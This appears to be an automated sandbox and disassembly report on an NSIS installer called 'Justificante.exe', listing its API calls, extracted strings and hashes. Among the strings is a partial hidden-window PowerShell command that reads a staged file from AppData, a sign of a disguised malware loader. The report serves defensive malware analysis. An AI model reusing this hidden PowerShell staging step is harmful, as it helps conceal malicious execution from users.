wsprintfW 4806->4809 4808->4806 4809->4798 4810 402f2b 4811 402f56 4810->4811 4812 402f3d SetTimer 4810->4812 4813 402fa4 4811->4813 4814 402faa MulDiv 4811->4814 4812->4811 4815 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4814->4815 4815->4813 4018 40242c 4019 402434 4018->4019 4020 40245f 4018->4020 4021 402d7e 17 API calls 4019->4021 4022 402d3e 17 API calls 4020->4022 4023 40243b 4021->4023 4024 402466 4022->4024 4025 402445 4023->4025 4029 402473 4023->4029 4030 402dfc 4024->4030 4027 402d3e 17 API calls 4025->4027 4028 40244c RegDeleteValueW RegCloseKey 4027->4028 4028->4029 4031 402e10 4030->4031 4032 402e09 4030->4032 4031->4032 4034 402e41 4031->4034 4032->4029 4035 4063a9 RegOpenKeyExW 4034->4035 4036 402e6f 4035->4036 4037 402f24 4036->4037 4038 402e79 4036->4038 4037->4032 4039 402e7f RegEnumValueW 4038->4039 4043 402ea2 4038->4043 4040 402f09 RegCloseKey 4039->4040 4039->4043 4040->4037 4041 402ede RegEnumKeyW 4042 402ee7 RegCloseKey 4041->4042 4041->4043 4044 406931 5 API calls 4042->4044 4043->4040 4043->4041 4043->4042 4045 402e41 6 API calls 4043->4045 4046 402ef7 4044->4046 4045->4043 4047 402f19 4046->4047 4048 402efb RegDeleteKeyW 4046->4048 4047->4037 4048->4037 4817 401a30 4818 402d3e 17 API calls 4817->4818 4819 401a39 ExpandEnvironmentStringsW 4818->4819 4820 401a4d 4819->4820 4822 401a60 4819->4822 4821 401a52 lstrcmpW 4820->4821 4820->4822 4821->4822 4096 401735 4097 402d3e 17 API calls 4096->4097 4098 40173c SearchPathW 4097->4098 4099 401757 4098->4099 4828 402636 4829 402665 4828->4829 4830 40264a 4828->4830 4831 402695 4829->4831 4832 40266a 4829->4832 4833 402d1c 17 API calls 4830->4833 4835 402d3e 17 API calls 4831->4835 4834 402d3e 17 API calls 4832->4834 4840 402651 4833->4840 4836 402671 4834->4836 4837 40269c lstrlenW 4835->4837 4845 40655e WideCharToMultiByte 4836->4845 4837->4840 4839 402685 lstrlenA 4839->4840 4841 4026df 4840->4841 4842 4026c9 4840->4842 4844 406113 5 API calls 4840->4844 4842->4841 4843 4060e4 WriteFile 
4842->4843 4843->4841 4844->4842 4845->4839 4846 401d38 4847 402d1c 17 API calls 4846->4847 4848 401d3f 4847->4848 4849 402d1c 17 API calls 4848->4849 4850 401d4b GetDlgItem 4849->4850 4851 402630 4850->4851 4852 4014b8 4853 4014be 4852->4853 4854 401389 2 API calls 4853->4854 4855 4014c6 4854->4855 4115 403fb9 4116 403fd1 4115->4116 4117 40410c 4115->4117 4116->4117 4118 403fdd 4116->4118 4119 40411d GetDlgItem GetDlgItem 4117->4119 4124 40415d 4117->4124 4121 403fe8 SetWindowPos 4118->4121 4122 403ffb 4118->4122 4123 404492 18 API calls 4119->4123 4120 4041b7 4125 4044de SendMessageW 4120->4125 4130 404107 4120->4130 4121->4122 4126 404000 ShowWindow 4122->4126 4127 404018 4122->4127 4128 404147 SetClassLongW 4123->4128 4124->4120 4129 401389 2 API calls 4124->4129 4154 4041c9 4125->4154 4126->4127 4131 404020 DestroyWindow 4127->4131 4132 40403a 4127->4132 4133 40140b 2 API calls 4128->4133 4134 40418f 4129->4134 4135 40441b 4131->4135 4136 404050 4132->4136 4137 40403f SetWindowLongW 4132->4137 4133->4124 4134->4120 4140 404193 SendMessageW 4134->4140 4135->4130 4146 40444c ShowWindow 4135->4146 4138 4040f9 4136->4138 4139 40405c GetDlgItem 4136->4139 4137->4130 4145 4044f9 8 API calls 4138->4145 4143 40408c 4139->4143 4144 40406f SendMessageW IsWindowEnabled 4139->4144 4140->4130 4141 40140b 2 API calls 4141->4154 4142 40441d DestroyWindow EndDialog 4142->4135 4148 404099 4143->4148 4150 4040e0 SendMessageW 4143->4150 4151 4040ac 4143->4151 4160 404091 4143->4160 4144->4130 4144->4143 4145->4130 4146->4130 4147 406579 17 API calls 4147->4154 4148->4150 4148->4160 4149 404492 18 API calls 4149->4154 4150->4138 4155 4040b4 4151->4155 4156 4040c9 4151->4156 4152 40446b SendMessageW 4153 4040c7 4152->4153 4153->4138 4154->4130 4154->4141 4154->4142 4154->4147 4154->4149 4161 404492 18 API calls 4154->4161 4177 40435d DestroyWindow 4154->4177 4158 40140b 2 API calls 4155->4158 4157 40140b 2 API calls 4156->4157 4159 4040d0 4157->4159 4158->4160 4159->4138 
4159->4160 4160->4152 4162 404244 GetDlgItem 4161->4162 4163 404261 ShowWindow KiUserCallbackDispatcher 4162->4163 4164 404259 4162->4164 4186 4044b4 KiUserCallbackDispatcher 4163->4186 4164->4163 4166 40428b EnableWindow 4171 40429f 4166->4171 4167 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4168 4042d4 SendMessageW 4167->4168 4167->4171 4168->4171 4170 403f9a 18 API calls 4170->4171 4171->4167 4171->4170 4187 4044c7 SendMessageW 4171->4187 4188 40653c lstrcpynW 4171->4188 4173 404303 lstrlenW 4174 406579 17 API calls 4173->4174 4175 404319 SetWindowTextW 4174->4175 4176 401389 2 API calls 4175->4176 4176->4154 4177->4135 4178 404377 CreateDialogParamW 4177->4178 4178->4135 4179 4043aa 4178->4179 4180 404492 18 API calls 4179->4180 4181 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4180->4181 4182 401389 2 API calls 4181->4182 4183 4043fb 4182->4183 4183->4130 4184 404403 ShowWindow 4183->4184 4185 4044de SendMessageW 4184->4185 4185->4135 4186->4166 4187->4171 4188->4173 4856 4028bb 4857 4028c1 4856->4857 4858 4028c9 FindClose 4857->4858 4859 402bc2 4857->4859 4858->4859 4860 40493c 4861 404972 4860->4861 4862 40494c 4860->4862 4863 4044f9 8 API calls 4861->4863 4864 404492 18 API calls 4862->4864 4865 40497e 4863->4865 4866 404959 SetDlgItemTextW 4864->4866 4866->4861

                          Control-flow Graph

                          APIs
                          • SetErrorMode.KERNELBASE ref: 004035FB
                          • GetVersion.KERNEL32 ref: 00403601
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                          • OleInitialize.OLE32(00000000), ref: 00403678
                          • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                          • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Justificante.exe",00000020,"C:\Users\user\Desktop\Justificante.exe",00000000,?,00000007,00000009,0000000B), ref: 004036E1
                            • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                            • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403838
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403854
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                          • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                            • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                          • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                          • ExitProcess.KERNEL32 ref: 0040396D
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403980
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040398F
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040399A
                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Justificante.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                          • DeleteFileW.KERNEL32(00420F08,00420F08,?,"powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Justificante.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                          • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                          • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                          • ExitProcess.KERNEL32 ref: 00403B13
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$"powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unavailability\unmeliorated$C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                          • API String ID: 3441113951-2951501894
                          • Opcode ID: 79b010d8ffa692541024cf2895b9fcb7f074167fc2173f366b29c6acfcbd45ef
                          • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                          • Opcode Fuzzy Hash: 79b010d8ffa692541024cf2895b9fcb7f074167fc2173f366b29c6acfcbd45ef
                          • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00405741
                          • GetDlgItem.USER32(?,000003EE), ref: 00405750
                          • GetClientRect.USER32(?,?), ref: 0040578D
                          • GetSystemMetrics.USER32(00000002), ref: 00405794
                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                          • ShowWindow.USER32(?,00000008), ref: 00405830
                          • GetDlgItem.USER32(?,000003EC), ref: 00405851
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                          • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                            • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                          • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                          • CloseHandle.KERNELBASE(00000000), ref: 004058B8
                          • ShowWindow.USER32(00000000), ref: 004058DC
                          • ShowWindow.USER32(?,00000008), ref: 004058E1
                          • ShowWindow.USER32(00000008), ref: 0040592B
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                          • CreatePopupMenu.USER32 ref: 00405970
                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                          • GetWindowRect.USER32(?,?), ref: 004059A4
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                          • OpenClipboard.USER32(00000000), ref: 00405A05
                          • EmptyClipboard.USER32 ref: 00405A0B
                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                          • GlobalLock.KERNEL32(00000000), ref: 00405A21
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                          • CloseClipboard.USER32 ref: 00405A66
                          Strings
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: H7B${
                          • API String ID: 590372296-2256286769
                          • Opcode ID: c0017decbe78a65f06690748f72a161ce53dba5701f2afa5c1723caa79f33480
                          • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                          • Opcode Fuzzy Hash: c0017decbe78a65f06690748f72a161ce53dba5701f2afa5c1723caa79f33480
                          • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68

                          APIs
                          • DeleteFileW.KERNELBASE(?,?,76F93420,76F92EE0,00000000), ref: 00405C77
                          • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CBF
                          • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CE2
                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CE8
                          • FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,00000000), ref: 00405CF8
                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                          • FindClose.KERNEL32(00000000), ref: 00405DA7
                          Strings
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$PWB$\*.*
                          • API String ID: 2035342205-702506766
                          • Opcode ID: 040ab76bf041593b80ddb5614b3ecdb7f10fff1f34e6e884be80ec8d6c7c0259
                          • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                          • Opcode Fuzzy Hash: 040ab76bf041593b80ddb5614b3ecdb7f10fff1f34e6e884be80ec8d6c7c0259
                          • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                          • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                          • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                          • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                          APIs
                          • FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0), ref: 004068A5
                          • FindClose.KERNEL32(00000000), ref: 004068B1
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                          • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                          • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                          • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                          • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                          • Opcode Fuzzy Hash: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                          • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A

                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                          • GetDlgItem.USER32(?,00000408), ref: 00404F23
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                          • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                          • DeleteObject.GDI32(00000110), ref: 00405000
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                            • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                          • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                          • ShowWindow.USER32(?,00000005), ref: 00405162
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                          • ImageList_Destroy.COMCTL32(?), ref: 00405336
                          • GlobalFree.KERNEL32(?), ref: 00405346
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                          • ShowWindow.USER32(?,00000000), ref: 004054EF
                          • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                          • ShowWindow.USER32(00000000), ref: 00405501
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 2564846305-813528018
                          • Opcode ID: 50828e4a68aa5ede264786db028a64b485a6342807f1fbc80fc3cba1a8e401c8
                          • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                          • Opcode Fuzzy Hash: 50828e4a68aa5ede264786db028a64b485a6342807f1fbc80fc3cba1a8e401c8
                          • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58

                          Control-flow Graph
                          • First basic block: 403fb9-403fcb
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                          • ShowWindow.USER32(?), ref: 00404012
                          • DestroyWindow.USER32 ref: 00404026
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                          • GetDlgItem.USER32(?,?), ref: 00404063
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                          • IsWindowEnabled.USER32(00000000), ref: 0040407E
                          • GetDlgItem.USER32(?,00000001), ref: 0040412C
                          • GetDlgItem.USER32(?,00000002), ref: 00404136
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                          • GetDlgItem.USER32(?,00000003), ref: 00404247
                          • ShowWindow.USER32(00000000,?), ref: 00404268
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040427A
                          • EnableWindow.USER32(?,?), ref: 00404295
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                          • EnableMenuItem.USER32(00000000), ref: 004042B2
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                          • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                          • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                          • ShowWindow.USER32(?,0000000A), ref: 0040444F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                          • String ID: H7B
                          • API String ID: 3282139019-2300413410
                          • Opcode ID: baf4e7a206198340e70a19425564cab513a6069eacfac64f5b5b997afbf4e255
                          • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                          • Opcode Fuzzy Hash: baf4e7a206198340e70a19425564cab513a6069eacfac64f5b5b997afbf4e255
                          • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E

                          Control-flow Graph
                          • First basic block: 403c0b-403c23
                          APIs
                            • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                            • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                          • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",00000000), ref: 00403C8C
                          • lstrlenW.KERNEL32(trikinse,?,?,?,trikinse,00000000,C:\Users\user\AppData\Local\unavailability\unmeliorated,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420), ref: 00403D0C
                          • lstrcmpiW.KERNEL32(?,.exe,trikinse,?,?,?,trikinse,00000000,C:\Users\user\AppData\Local\unavailability\unmeliorated,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                          • GetFileAttributesW.KERNEL32(trikinse), ref: 00403D2A
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unavailability\unmeliorated), ref: 00403D73
                            • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                          • RegisterClassW.USER32(00429200), ref: 00403DB0
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                          • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                          • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                          • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                          • RegisterClassW.USER32(00429200), ref: 00403E75
                          • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unavailability\unmeliorated$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$trikinse
                          • API String ID: 1975747703-1054394960
                          • Opcode ID: 92681064c2eb18a8eb976b4004cb2b2121f5eb92f5676c9d8e5c00cebc89f70e
                          • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                          • Opcode Fuzzy Hash: 92681064c2eb18a8eb976b4004cb2b2121f5eb92f5676c9d8e5c00cebc89f70e
                          • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

                          Control-flow Graph
                          • First basic block: 403068-4030b6
                          APIs
                          • GetTickCount.KERNEL32 ref: 0040307C
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Justificante.exe,00000400), ref: 00403098
                            • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00406036
                            • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
